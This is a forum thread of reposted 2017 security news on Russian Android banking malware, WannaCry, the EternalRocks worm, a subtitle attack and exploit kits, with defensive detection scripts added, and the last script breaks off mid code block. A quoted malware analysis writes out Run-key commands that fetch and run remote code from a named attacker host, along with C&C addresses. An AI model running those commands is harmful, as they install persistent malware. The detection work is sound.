SMALL WARS COUNCIL
Media, Information & Cyber Warriors: getting the story, dealing with those who do, and operating in the information & cyber domains.

Old 5 Days Ago   #61
OUTLAW 09
Council Member
Join Date: Nov 2013
Posts: 33,897

http://www.reuters.com/article/us-ru..._medium=Social

Technology News | Mon May 22, 2017 | 5:00am EDT

Exclusive: Hackers hit Russian bank customers, planned international cyber raids

Quote:
Russian cyber criminals used malware planted on Android mobile devices to steal from domestic bank customers and were planning to target European lenders before their arrest, investigators and sources with knowledge of the case told Reuters.
Their campaign raised a relatively small sum by cyber-crime standards - more than 50 million roubles ($892,000) - but they had also obtained more sophisticated malicious software for a modest monthly fee to go after the clients of banks in France and possibly a range of other western nations.
Russia's relationship to cyber crime is under intense scrutiny after U.S. intelligence officials alleged that Russian hackers had tried to help Republican Donald Trump win the U.S. presidency by hacking Democratic Party servers.
The Kremlin has repeatedly denied the allegation.
The gang members tricked the Russian banks' customers into downloading malware via fake mobile banking applications, as well as via pornography and e-commerce programs, according to a report compiled by cyber security firm Group-IB which investigated the attack with the Russian Interior Ministry.
The criminals - 16 suspects were arrested by Russian law enforcement authorities in November last year - infected more than a million smartphones in Russia, on average compromising 3,500 devices a day, Group-IB said.
The hackers targeted customers of state lender Sberbank, and also stole money from accounts at Alfa Bank and online payments company Qiwi, exploiting weaknesses in the companies' SMS text message transfer services, said two people with direct knowledge of the case.
Although operating only in Russia before their arrest, they had developed plans to target large European banks including French lenders Credit Agricole, BNP Paribas and Societe Generale, Group-IB said.
A BNP Paribas spokeswoman said the bank could not confirm this information, but added that it "has a significant set of measures in place aimed at fighting cyber attacks on a daily basis". Societe Generale and Credit Agricole declined comment.
The gang, which was called "Cron" after the malware it used, did not steal any funds from customers of the three French banks. However, it exploited the bank service in Russia that allows users to transfer small sums to other accounts by sending an SMS message.
Having infected the users' phones, the gang sent SMS messages from those devices instructing the banks to transfer money to the hackers' own accounts.
The findings illustrate the dangers of using SMS messages for mobile banking, a method favored in emerging countries with less advanced internet infrastructure, said Lukas Stefanko, a malware researcher at cyber security firm ESET in Slovakia.
"It's becoming popular among developing nations or in the countryside where access to conventional banking is difficult for people," he said. "For them it is quick, easy and they don't need to visit a bank... But security always has to outweigh consumer convenience."

CYBER CRIMINALS
The Russian Interior Ministry said a number of people had been arrested, including what it described as the gang leader. This was a 30-year-old man living in Ivanovo, an industrial city 300 km (185 miles) northeast of Moscow, from where he had commanded a team of 20 people across six different regions.
Four people remain in detention while the others are under house arrest, the ministry said in a statement.
"In the course of 20 searches across six regions, police seized computers, hundreds of bank cards and SIM cards registered under fake names," it said.
Group-IB said the existence of the Cron malware was first detected in mid-2015, and by the time of the arrests the hackers had been using it for under a year.
The core members of the group were detained on Nov. 22 last year in Ivanovo. Photographs of the operation released by Group-IB showed one suspect face down in the snow as police in ski masks handcuffed him.
The "Cron" hackers were arrested before they could mount attacks outside Russia, but plans to do that were at an advanced stage, said the investigators.
Group-IB said that in June 2016 they had rented a piece of malware designed to attack mobile banking systems, called "Tiny.z" for $2,000 a month. The creators of the "Tiny.z" malware had adapted it to attack banks in Britain, Germany, France, the United States and Turkey, among other countries.
The "Cron" gang developed software designed to attack lenders including the three French groups, it said, adding it had notified these and other European banks at risk.
A spokeswoman for Sberbank said she had no information about the group involved. However, she said: "Several groups of cyber criminals are working against Sberbank. The number of groups and the methods they use to attack us change constantly."
"It isn't clear which specific group is being referred to here because the fraudulent scheme involving Android OS (operating system) viruses is widespread in Russia and Sberbank has effectively combated it for an extensive period of time."
Alfa Bank did not provide a comment. Qiwi did not respond to multiple requests for comment.
Google, the maker of Android, has taken steps in recent years to protect users from downloading malicious code and by blocking apps which are insecure, impersonate legitimate companies or engage in deceptive behaviors.
The company declined to comment for this story, saying they had not seen the Group-IB report.

FAKE MOBILE APPS
The Russian authorities, bombarded with allegations of state-sponsored hacking, are keen to show Russia too is a frequent victim of cyber crime and that they are working hard to combat it. The interior and emergencies ministries, as well as Sberbank, said they were targeted in a global cyberattack earlier this month.
Since the allegations about the U.S. election hacking, further evidence has emerged of what some Western officials say is a symbiotic relationship between cyber criminals and Russian authorities, with hackers allowed to attack foreign targets with impunity in return for cooperating with the security services while Moscow clamps down on those operating at home.
The success of the Cron gang was facilitated by the popularity of SMS-banking services in Russia, said Dmitry Volkov, head of investigations at Group-IB.
The gang got their malware on to victims' devices by setting up applications designed to mimic banks' genuine apps. When users searched online, the results would suggest the fake app, which they would then download. The hackers also inserted malware into fake mobile apps for well-known pornography sites.
After infecting a customer's phone, the hackers were able to send a text message to the bank initiating a transfer of up to $120 to one of 6,000 bank accounts set up to receive the fraudulent payments.
The malware would then intercept a confirmation code sent by the bank and block the victim from receiving a message notifying them about the transaction.
"Cron's success was due to two main factors," Volkov said. "First, the large-scale use of partner programs to distribute the malware in different ways. Second, the automation of many (mobile) functions which allowed them to carry out the thefts without direct involvement."
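The Reuters piece above describes the bank-side weakness well enough to show the detection a practitioner would want: many compromised phones each pushing one small SMS-initiated transfer into a shared pool of mule accounts. The following is an added example (not from the article, Group-IB or any bank): a fan-in check over a bank's SMS-transfer audit log. The log format, the phone numbers and account identifiers are constructed for the example; the $120 per-transfer ceiling comes from the article, and the 24-hour window and three-distinct-sender threshold are my own assumptions for a starting point.

```python
"""Added example: fan-in detection for SMS-initiated transfers (constructed data)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed bank-side audit log of SMS transfer commands. The format, the
# MSISDNs and the account ids are assumptions for this example, not real records.
SAMPLE_LOG = """\
2016-11-01T09:00:12 from=+79160000001 to=ACC-9001 amount=118.00 status=confirmed
2016-11-01T09:03:40 from=+79160000002 to=ACC-9001 amount=115.50 status=confirmed
2016-11-01T09:07:05 from=+79160000003 to=ACC-9001 amount=119.00 status=confirmed
2016-11-01T10:15:22 from=+79160000004 to=ACC-9001 amount=110.00 status=confirmed
2016-11-01T10:20:00 from=+79160000001 to=ACC-9001 amount=112.00 status=confirmed
2016-11-01T11:00:00 from=+79160000050 to=ACC-1234 amount=40.00 status=confirmed
2016-11-02T11:00:00 from=+79160000050 to=ACC-1234 amount=40.00 status=confirmed
2016-11-03T12:00:00 from=+79160000060 to=ACC-1234 amount=35.00 status=confirmed
2016-11-05T12:00:00 from=+79160000070 to=ACC-1234 amount=35.00 status=confirmed
"""

LINE_RE = re.compile(r"^(\S+) from=(\S+) to=(\S+) amount=([\d.]+) status=(\w+)$")


def parse_log(text):
    """Parse the constructed log into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, sender, dest, amount, status = m.groups()
        events.append({"ts": datetime.fromisoformat(ts), "from": sender,
                       "to": dest, "amount": float(amount), "status": status})
    return events


def flag_mule_accounts(events, min_senders=3, window=timedelta(hours=24), max_amount=120.0):
    """Return {beneficiary: peak distinct senders inside `window`} for beneficiaries
    that receive small confirmed transfers from at least `min_senders` different
    payers within the window. A household paying one relative repeatedly has a
    fan-in of 1 and is not flagged; a mule account fed by infected handsets is."""
    by_dest = defaultdict(list)
    for e in events:
        if e["status"] == "confirmed" and e["amount"] <= max_amount:
            by_dest[e["to"]].append(e)
    flagged = {}
    for dest, evs in by_dest.items():
        evs.sort(key=lambda e: e["ts"])
        peak, start = 0, 0
        for end in range(len(evs)):
            # slide the window start forward until it spans at most `window`
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            distinct = len({e["from"] for e in evs[start:end + 1]})
            peak = max(peak, distinct)
        if peak >= min_senders:
            flagged[dest] = peak
    return flagged


if __name__ == "__main__":
    print(flag_mule_accounts(parse_log(SAMPLE_LOG)))
```

On the constructed log this flags ACC-9001 (four distinct payers within an hour) and leaves ACC-1234 alone. The check is deliberately independent of the OTP: the article's point is that the confirmation code is delivered to the very device that issued the command, so a confirmed transfer proves nothing about the account holder's intent, and the beneficiary-side pattern is the signal that survives.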
Old 5 Days Ago   #62
OUTLAW 09
Council Member


Quote:
Originally Posted by OUTLAW 09
Patriarch of Russian Orthodox church making sure that the Ministry of Internal Affairs computers won't get affected by WannaCry virus attack
Russia suffered the highest number of registered WannaCry attacks globally and now suddenly they did not.....

Deputy secretary for Russia's National Security Council says WannaCry ransomware caused minimal damage in Russia.

That is not the story carried by their state media in the first days of the attack....

Over 100K computers got hit... as Russia runs largely illegal MS XP copies... and illegal copies of MS Server 2003...
Old 4 Days Ago   #63
flagg
Council Member
Join Date: Dec 2009
Posts: 71


Quote:
Originally Posted by OUTLAW 09
Russia suffered the highest number of registered WannaCry attacks globally and now suddenly they did not.....

Deputy secretary for Russia's National Security Council says WannaCry ransomware caused minimal damage in Russia.

That is not the story carried by their state media in the first days of the attack....

Over 100K computers got hit... as Russia runs largely illegal MS XP copies... and illegal copies of MS Server 2003...
Average Russian OSes are XP and MS Server 03?

That's crazy.

I think I also read that Russian banks only invest a fraction of that spent by major US/Western banks on IT/Cyber security.

Is the Russian banking sector seriously vulnerable to a non attributable proxy attack campaign?

Old 4 Days Ago   #64
OUTLAW 09
Council Member


Quote:
Originally Posted by flagg
Average Russian OS's are XP and MS Server 03?

That's crazy.

I think I also read that Russian banks only invest a fraction of that spent by major US/Western banks on IT/Cyber security.

Is the Russian banking sector seriously vulnerable to a non attributable proxy attack campaign?
Answer to the question is... yes they are. Example: Morgan Stanley invested over 600M USD in IT security in 2016 for their global network...

Entire Russian banking system: 25M USD...

BTW...a lot of MS W7 was hit inside Russia......


Old 4 Days Ago   #65
OUTLAW 09
Council Member


A security expert discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw to spread itself like WannaCry ransomware.

Quote:
The security expert Miroslav Stampar, a member of the Croatian Government CERT, has discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw in the SMB protocol to spread itself like the popular WannaCry ransomware.
Stampar discovered EternalRocks after it infected his SMB honeypot; he called the malware ‘DoomsDayWorm’.

Stampar discovered that EternalRocks disguises itself as WannaCry, but instead of delivering ransomware, it takes over the affected computer to power other attacks.

The researcher decompiled an older sample (start of May) of EternalRocks and published it on Github.

Unlike the WannaCry ransomware, which leverages the two NSA hacking tools EternalBlue and DoublePulsar, EternalRocks uses seven exploits leaked by the Shadow Brokers, and its code doesn’t include a kill-switch.

EternalRocks was developed to avoid detection and to remain undetectable on the target system; it uses the following NSA exploits:

EternalBlue — SMBv1 exploit tool
EternalRomance — SMBv1 exploit tool
EternalChampion — SMBv2 exploit tool
EternalSynergy — SMBv3 exploit tool
SMBTouch — SMB reconnaissance tool
ArchTouch — SMB reconnaissance tool
DoublePulsar — Backdoor Trojan

EternalRocks downloads all the above SMB exploits to the infected computer, then it scans the internet for open SMB ports on other systems to compromise.

Looking closely at the list, we find the SMB exploits EternalBlue, EternalChampion, EternalSynergy and EternalRomance.
DoublePulsar is the exploit used by the malware to implement network worm capabilities, while SMBTouch and ArchTouch are SMB reconnaissance tools, designed to scan for systems with open SMB ports exposed on the Internet.

The EternalRocks works in two stages:
During the first stage, EternalRocks downloads the Tor web browser on the affected computers, then it uses the application to connect to the command-and-control (C&C) server located on the Tor network.
After 24 hours the second stage starts; the malware delays its action in an attempt to evade sandboxing techniques.

“First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages) TaskScheduler and SharpZLib from Internet, while dropping svchost.exe (e.g. sample) and taskhost.exe (e.g. sample). Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C (ubgdgno5eswkhmpy.onion) communication requesting further instructions (e.g. installation of new components),” wrote the researcher.
“Second stage malware taskhost.exe (Note: different than one from first stage) (e.g. sample) is being downloaded after a predefined period (24h) from http://ubgdgno5eswkhmpy.onion/updates/download?id=PC and run. After initial run it drops the exploit pack shadowbrokers.zip and unpacks contained directories payloads/, configs/ and bins/. After that, starts a random scan of opened 445 (SMB) ports on Internet, while running contained exploits (inside directory bins/) and pushing the first stage malware through payloads (inside directory payloads/). Also, it expects running Tor process from first stage to get further instructions from C&C.”

Callback to C&C for successful second stage installation is: ubgdgno5eswkhmpy[.]onion/updates/shadowsinstalled?version=1,55
Miroslav Stampar @stamparm
Just captured 406ac1595991ea7ca97bc908a6538131 and 5c9f450f2488140c21b6a0bd37db6a40 in MS17-010 honeypot. MSIL/.NET #WannaCry copycat(s)

Miroslav Stampar @stamparm
Info on (new) EternalRocks worm can be found on
https://github.com/stamparm/EternalRocks/
... Will keep it updated, along with @_jsoo_

Update on #EternalRocks. Original name is actually "MicroBotMassiveNet" while author's nick is "tmc" https://github.com/stamparm/EternalR...ebug-strings …

If I will be asked to choose a name, let it be a DoomsDayWorm c52f20a854efb013a0a1248fd84aaa95

P.S. there is no kill-switch. Everything goes through Tor. Initial infection by MS17-010 drops Tor binaries for further communication

Somebody actually used complete Shadowbrokers dump (SMB part) and made a worm out of it. Uses WannaCry names (taskhost/svchost) to distract

Seems to be just spreading at the moment and getting further commands from C&C

Whole EternalRocks campaign (first and second stage malware) uses Mutex: {8F6F00C4-B901-45fd-08CF-72FDEFF}
Old 4 Days Ago   #66
OUTLAW 09
Council Member


URGENTLY IMPORTANT

It is just a matter of time until common malware through phishing bad guys will incorporate SMB exploits for synergistic attack.

Then, we all die.........

Old 3 Days Ago   #67
OUTLAW 09
Council Member


WARNING to US Military and SWJ commenters and readers.....

Kremlin troll @Noclador
was right @hardhouz13

Old 1 Day Ago   #68
OUTLAW 09
Council Member


Recent on BRZbank hack. Bank hasn't owned up. Incl US accts. Never "exploited [on] such a big scale."Hacked 10/22/16 https://www.wired.com/2017/04/hacker...e-operation/#…

Old 18 Hours Ago   #69
OUTLAW 09
Council Member


Security experts from Check Point warn of a subtitles hack that threatens millions of devices.

Quote:
According to the experts at Check Point, hackers could exploit a new attack vector that uses malicious subtitles to compromise devices via their media players.
Millions of users worldwide can be targeted due to security vulnerabilities in many popular streaming platforms, including VLC, Kodi (XBMC), Popcorn-Time, and strem.io.
“Check Point researchers revealed a new attack vector which threatens millions of users worldwide – attack by subtitles.” states the analysis shared by Check Point. “By crafting malicious subtitle files, which are then downloaded by a victim’s media player, attackers can take complete control over any type of device via vulnerabilities found in many popular streaming platforms, including VLC, Kodi (XBMC), Popcorn-Time and strem.io. We estimate there are approximately 200 million video players and streamers that currently run the vulnerable software, making this one of the most widespread, easily accessed and zero-resistance vulnerability reported in recent years.”
Patches for these vulnerabilities are available for download; users should apply them immediately.
According to the security firm, approximately 200 million video players and streamers are currently exposed to the subtitle attack.
“We estimate there are approximately 200 million video players and streamers that currently run the vulnerable software, making this one of the most widespread, easily accessed and zero-resistance vulnerability reported in recent years,” continues the analysis. “Hacked in Translation.”
The attackers can craft malicious subtitle files that, once processed by a user’s media player, can allow attackers to take complete control over any type of device (i.e. laptops, smart TVs, tablets, and smartphones).
Unlike other attack vectors well known to security firms, this hacking technique is very subtle because subtitles are perceived as harmless text files and are not subject to inspection by security solutions.

In subtitles hack, the subtitle can be manipulated by attackers for several malicious purposes.
“This method requires little or no deliberate action on the part of the user, making it all the more dangerous,” states Check Point.
Check Point analyzed vulnerabilities in media players that allow a remote attacker to execute code and gain full control of the targeted system.
The researchers were able to exploit a flaw in the popular VLC player to trigger a memory corruption issue and to gain control of a PC. Similar successful tests allowed the researchers to demonstrate the subtitles hack on other players.
Check Point presented a proof of concept attack, and says victims are persuaded to visit a malicious website that uses one of the streaming video players, or they are tricked into running a malicious subtitle file on their system that they intentionally downloaded for use with a video.
“By conducting attacks through subtitles, hackers can take complete control over any device running them. From this point on, the attacker can do whatever he wants with the victim’s machine, whether it is a PC, a smart TV, or a mobile device. The potential damage the attacker can inflict is endless, ranging anywhere from stealing sensitive information, installing ransomware, mass Denial of Service attacks, and much more,” wrote Check Point.
Check Point plans to disclose the technical details of the tests only when software updates have been provided to the users.
Below is the list of updates currently available:
PopcornTime – created a fixed version; however, it is not yet available to download on the official website. The fixed version can be manually downloaded via the following link:
https://ci.popcorntime.sh/job/Popcorn-Time-Desktop/249
Kodi – officially fixed and available to download on their website. Link:
https://kodi.tv/download
VLC – officially fixed and available to download on their website. Link:
http://get.videolan.org/vlc/2.2.5.1/....5.1-win32.exe
Stremio – officially fixed and available to download on their website. Link:
https://www.strem.io/
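Check Point had not published the technical details when the article above was written, so the specific parser bugs are not on this page. What the post does establish is the general lesson: a subtitle file is untrusted input that players parse as if it were harmless text. As an added example (my own code, not Check Point's PoC or any player's fix), here is an SRT parser written the defensive way: strict timestamp grammar, hard caps on cue count, line count and line length, control characters rejected, and markup stripped rather than interpreted. The cap values and the sample subtitle files are assumptions constructed for the example.

```python
"""Added example: a defensive SRT parser that treats subtitle files as untrusted input."""
import re

MAX_CUES = 5000            # caps are assumptions chosen for this example
MAX_LINES_PER_CUE = 6
MAX_LINE_LENGTH = 256
TIMING_RE = re.compile(
    r"^(\d{2}):(\d{2}):(\d{2}),(\d{3}) --> (\d{2}):(\d{2}):(\d{2}),(\d{3})\s*$")
TAG_RE = re.compile(r"<[^>]{0,32}>")       # strip markup instead of rendering it
CONTROL_RE = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")   # tabs/newlines allowed


class SubtitleError(ValueError):
    """Raised for any input that does not fit the strict grammar."""


def _to_ms(h, m, s, ms):
    h, m, s, ms = int(h), int(m), int(s), int(ms)
    if m > 59 or s > 59:
        raise SubtitleError("timestamp out of range")
    return ((h * 60 + m) * 60 + s) * 1000 + ms


def parse_srt(text):
    """Return [(index, start_ms, end_ms, [text lines])]; raise SubtitleError on
    anything outside the expected grammar or size limits."""
    if CONTROL_RE.search(text):
        raise SubtitleError("control characters in subtitle file")
    text = text.replace("\r\n", "\n").strip()
    cues = []
    for block in re.split(r"\n\s*\n", text):
        lines = block.split("\n")
        if len(lines) < 2 or not lines[0].strip().isdigit():
            raise SubtitleError("malformed cue header")
        m = TIMING_RE.match(lines[1])
        if not m:
            raise SubtitleError("malformed timing line")
        start, end = _to_ms(*m.groups()[:4]), _to_ms(*m.groups()[4:])
        if end < start:
            raise SubtitleError("cue ends before it starts")
        body = lines[2:]
        if len(body) > MAX_LINES_PER_CUE:
            raise SubtitleError("too many lines in cue")
        clean = []
        for line in body:
            if len(line) > MAX_LINE_LENGTH:
                raise SubtitleError("overlong subtitle line")
            clean.append(TAG_RE.sub("", line))
        cues.append((int(lines[0]), start, end, clean))
        if len(cues) > MAX_CUES:
            raise SubtitleError("too many cues")
    return cues


# Constructed samples: a well-formed file and one with a 5000-character line.
GOOD_SRT = """1
00:00:01,000 --> 00:00:03,500
Hello, <i>world</i>.

2
00:00:04,000 --> 00:00:06,000
Second line
"""
BAD_SRT = "1\n00:00:01,000 --> 00:00:03,500\n" + "A" * 5000 + "\n"

if __name__ == "__main__":
    print(parse_srt(GOOD_SRT))
    try:
        parse_srt(BAD_SRT)
    except SubtitleError as exc:
        print("rejected:", exc)
```

The design point is that every field is matched against a closed grammar before any value is used, and nothing in the file is passed to a richer interpreter (no HTML, no format strings, no length fields taken on trust). A real player also needs the same discipline for the other subtitle formats it accepts, not only SRT.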
Old 17 Hours Ago   #70
OUTLAW 09
Council Member


At least 3 different groups have been leveraging the NSA EternalBlue exploit weeks before the WannaCry attacks, here’s the evidence.

Quote:
In the last days, security experts discovered numerous attacks that have been leveraging the same EternalBlue exploit used by the notorious WannaCry ransomware.
The Shadow Brokers hacker group revealed the exploit for the SMB vulnerability in April, but according to malware researchers, other threats used it such as the Adylkuzz botnet that is active since April 24.
Security experts at Cyphort found evidence on a honeypot server that threat actors in the wild were already exploiting the SMB flaw in early May to deliver a stealth Remote Access Trojan (RAT) instead of ransomware.
The RAT didn’t show network worm capabilities like the WannaCry ransomware.
The malware is delivered from an IP (182.18.23.38) located in China.
“Once the exploitation is successful, the attacker will send an encrypted payload as a shellcode. The shellcode is encrypted via XOR with the key, “A9 CA 63 BA”. The shellcode has an embedded binary in it as shown below:” reads the analysis published by Cyphort. “The embedded DLL is basically a trojan which downloads additional malware and receives commands from its controller.”
Once it has infected a system, the malicious code closes port 445 to prevent other malware from abusing the same SMB flaw.
This aspect suggests the attacker was aware of the EternalBlue vulnerability.
“This is yet another indication that the malware is probably aware of the Eternal Blue vulnerability and is closing it.” continues the analysis. “The threat actors probably did not want other threats mingling with their activity. We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. We found similarities in terms of their IOCs.”
The RAT sets the following Registry Run entries to download and execute additional malware:
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q" /f
The malicious code attempts to delete a number of users and terminate and/or delete various files or processes. The experts also noticed that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.
The malware can be instructed by the C&C server to execute various commands, including the screen monitoring, capturing audio and video, monitoring keystrokes, transfer data, deleting files, terminating processes, downloading and executing files and many other operations.
The report published by Cyphort included the Indicators of Compromise for this specific threat.
The fact that multiple groups have been exploiting ETERNALBLUE weeks before WannaCry is also demonstrated by an analysis published by Secdo.
Secdo claims to have found evidence of ransomware abusing the EternalBlue flaw weeks before WannaCry emerged.
“Secdo has uncovered a new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since mid-April.” reads the analysis published by Secdo. “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed.”

The researchers also reported that threat actors in the wild were using an EternalBlue-based worm to infect all machines in a compromised network and exfiltrate login credentials.
Recently experts at Heimdal discovered the UIWIX ransomware, a fileless malware exploiting the EternalBlue vulnerability.
Like WannaCry, UIWIX exploits the same vulnerability in the Windows SMB protocol, but the new threat has the ability to run in the memory of the infected system after exploiting EternalBlue.
In late April, the experts at Secdo also discovered another attack exploiting the EternalBlue vulnerability; it was associated with a Chinese threat actor that used a botnet to distribute a backdoor.
“It begins by spawning a thread inside of lsass.exe, similar to the credential theft attack, only instead of remaining purely in-memory, the initial payload connects back to a Chinese C2 server on port 998 (2.x.x.x) and downloads a known root-kit backdoor (based on Agony).” reads the analysis published by Secdo.
“The file is dropped in %programdata% under the name 666.exe. Existing NG-AV vendors that were present were able to block 666.exe from running, but remained oblivious to the malicious thread running inside of lsass.exe.”
Summarizing, at least 3 different groups have been leveraging the NSA exploit weeks before WannaCry; this means that a significant portion of the security community either failed to monitor the threat or failed to share information about the attacks they had observed.
The success of the EternalBlue attacks is a failure of our current model of cyber security.
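The two `reg add` lines quoted in the Cyphort write-up are the most durable artefact in that post: persistence through a Run key whose command is a signed Windows binary (`regsvr32` with a remote `.sct` scriptlet, `msiexec` with a remote `.msi`) rather than a dropped executable, which is why the file-focused AV mentioned elsewhere in the thread misses it. As an added example (not from Cyphort's report), here is a small triage script that parses `reg query` output and flags autorun values of that shape. The sample input is constructed: the two malicious values mirror the commands in the post, the other two are benign filler. The rule list is my own; the generic "any URL in an autorun" rule assumes that no legitimate autorun in the environment fetches code over HTTP at logon, which you should confirm before alerting on it.

```python
"""Added example: flag Run-key autoruns that launch a LOLBin against a remote URL."""
import re

# Constructed `reg query <key>` output. "start"/"start1" mirror the commands in the
# Cyphort quote above; SecurityHealth and OneDrive are benign filler entries.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    start    REG_SZ    regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll
    start1    REG_SZ    msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
"""

# reg query prints value lines indented, with columns separated by 4 spaces.
VALUE_RE = re.compile(r"^\s+(?P<name>\S.*?)\s{2,}(?P<type>REG_[A-Z_]+)\s{2,}(?P<data>.*)$")

# First matching rule wins. The regsvr32 and msiexec patterns are taken from the
# commands in the post; the catch-all URL rule is an assumption (see lead-in).
RULES = (
    ("regsvr32 scriptlet from URL (/i:<url> scrobj.dll)",
     re.compile(r"\bregsvr32(\.exe)?\b.*/i:\S*https?://.*\bscrobj\.dll\b", re.I)),
    ("msiexec install from URL",
     re.compile(r"\bmsiexec(\.exe)?\b.*\s/i\s+https?://", re.I)),
    ("autorun fetching a URL",
     re.compile(r"https?://", re.I)),
)


def parse_reg_query(text):
    """Yield {key, name, type, data} for each value line under each key header."""
    key = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():          # unindented line = key header
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if m and key:
            yield {"key": key, **m.groupdict()}


def flag_autoruns(entries):
    """Return [(key, value name, reason)] for entries whose command matches a rule."""
    hits = []
    for e in entries:
        for reason, pattern in RULES:
            if pattern.search(e["data"]):
                hits.append((e["key"], e["name"], reason))
                break
    return hits


if __name__ == "__main__":
    for key, name, reason in flag_autoruns(parse_reg_query(SAMPLE_REG_QUERY)):
        print(f"{key}\\{name}: {reason}")
```

On a live host, feed it the output of `reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"` and the HKCU equivalent (or the Wow6432Node and RunOnce keys as well). It is a point-in-time check of one persistence location; the same `regsvr32 /i:<url> scrobj.dll` and `msiexec /i <url>` patterns are worth matching in process-creation telemetry, where they show up regardless of which autostart location launched them.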
Old 17 Hours Ago   #71
OUTLAW 09
Council Member


Experts from Talos Team discovered changes made to the Terror exploit kit (EK) that allow it to fingerprint victims and target specific vulnerabilities.

Quote:
Recent changes made to the Terror exploit kit (EK) allow it to fingerprint victims and target specific vulnerabilities instead of carpet bombing the victims with many exploits at the same time, Talos researchers discovered.
Last week I reported the news of the improvements of the Stegano Exploit kit, today we will speak about the Terror exploit kit that now includes fingerprinting capabilities.
The Terror Exploit Kit first appeared in the threat landscape in January 2017, in April experts observed a significant increase of hacking campaigns leveraging the EK.
Because of similarities with Sundown EK, experts at MalwareBytes initially thought that the Terror EK was simply a new variant of Sundown, but further investigation revealed that it was actually from a different actor (so-called Terror EK by Trustwave).
The Terror EK was advertised on various underground forums by a hacker with the online moniker @666_KingCobra that is offering it for sale under different names (i.e. Blaze, Neptune, and Eris).
Experts at Malwarebytes Labs said that the Terror EK was used in a malvertising campaign distributing the Smoke Loader by exploiting Internet Explorer, Flash, and Silverlight exploits.
The Terror EK was also involved in a campaign using a different landing page that distributes the Andromeda malware.
The compromised websites were used to redirect to the exploit kit landing page via server 302 redirect call and done via script injection.
The powerful exploit kit was observed carpet bombing victims using many exploits at the same time, but now experts from the Talos group have observed a significant change in tactic. News of the day is that the Terror Exploit Kit was improved with new exploits and implemented fingerprinting abilities. These latter features allow the EK to determine which exploit should be used in order to compromise the target system.
The new variant of the Terror Exploit Kit was able to determine the specific OS running on the victim’s PC, the browser version, installed security patches and plugins.
The researchers were served different files when accessing the site via different browsers, such as Internet Explorer 11 or Internet Explorer 8.
Talos malware researchers identified a potentially compromised legitimate website that operates as a malware gate. The website was initially used to redirect visitors to a RIG landing page; after a single day of analysis the gate switched to the Terror exploit kit.
“Terror seems to be constantly evolving. In this campaign it has added further exploits and no longer carpet bombs the victim. Instead it evaluates data regarding the victim’s environment and then picks potentially successful exploits depending on the victim’s operating system, patch level, browser version and installed plugins. This makes it harder for an investigator to fully uncover which exploits they have.” reads the analysis published by Talos.
“It is interesting to note that the adversaries are using a URL parameter in cleartext for the vulnerability they are going to exploit, e.g. cve2013-2551 = cve20132551 in the URL.”
The compromised website discovered by Talos experts redirects users to the EK landing page by using an HTTP 302 Moved Temporarily response, like previous campaigns.

The page uses obfuscated Javascript code to determine the victim’s browser environment, then uses the return value of this function to submit a hidden form called ‘frm’.
“As mentioned in the executive overview, it uses some obfuscated Javascript code to evaluate the victim’s browser environment, for example it tries to get version information about the following plugins: ActiveX, Flash, PDF reader, Java, Silverlight, QuickTime, etc. Then it uses the return value of this function to submit the hidden form called ‘frm’.” continues the analysis.
The EK also uses cookie-based authentication for downloading the exploits, which prevents third-parties from accessing them, the security researchers discovered. This approach prevents not only investigators from learning where from or how the victims were infected, but also stops competitors from stealing the exploits.
“We have seen that the exploit kit market is experiencing an ongoing change. Big players in this market disappear while new ones show up. The new players are fighting for customers by constantly improving their quality and techniques. They modify these techniques on an ongoing basis to improve their capability to bypass security tools. This clearly shows how important it is to make sure that all your systems are up to date,” concluded Talos.
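Two of the Terror EK traits Talos describes above are visible in ordinary web-proxy logs without any access to the exploit payloads: the CVE token carried in cleartext in the exploit URL (their example is `cve20132551`) and the 302 hop from a compromised "gate" site to the landing page. As an added example (my own code, not Talos's), here is a triage script that normalises any such token to a CVE id and correlates it, per client, with a preceding cross-host 302 within a short window. The proxy log format, the `.example` hostnames and the 30-second window are assumptions constructed for the example.

```python
"""Added example: proxy-log triage for exploit-kit traits (CVE token in the URL,
cross-host 302 from a gate site shortly before it)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed proxy log: timestamp client method url status referer.
# Hosts are .example placeholders; the cve20132551 parameter form is Talos's.
SAMPLE_PROXY_LOG = """\
2017-05-22T10:00:01 10.0.0.5 GET http://compromised-site.example/index.php 200 -
2017-05-22T10:00:02 10.0.0.5 GET http://compromised-site.example/wp-includes/inject.js 302 http://compromised-site.example/index.php
2017-05-22T10:00:03 10.0.0.5 GET http://landing.example/gate.php 200 http://compromised-site.example/index.php
2017-05-22T10:00:04 10.0.0.5 GET http://landing.example/load.php?cve20132551=1 200 http://landing.example/gate.php
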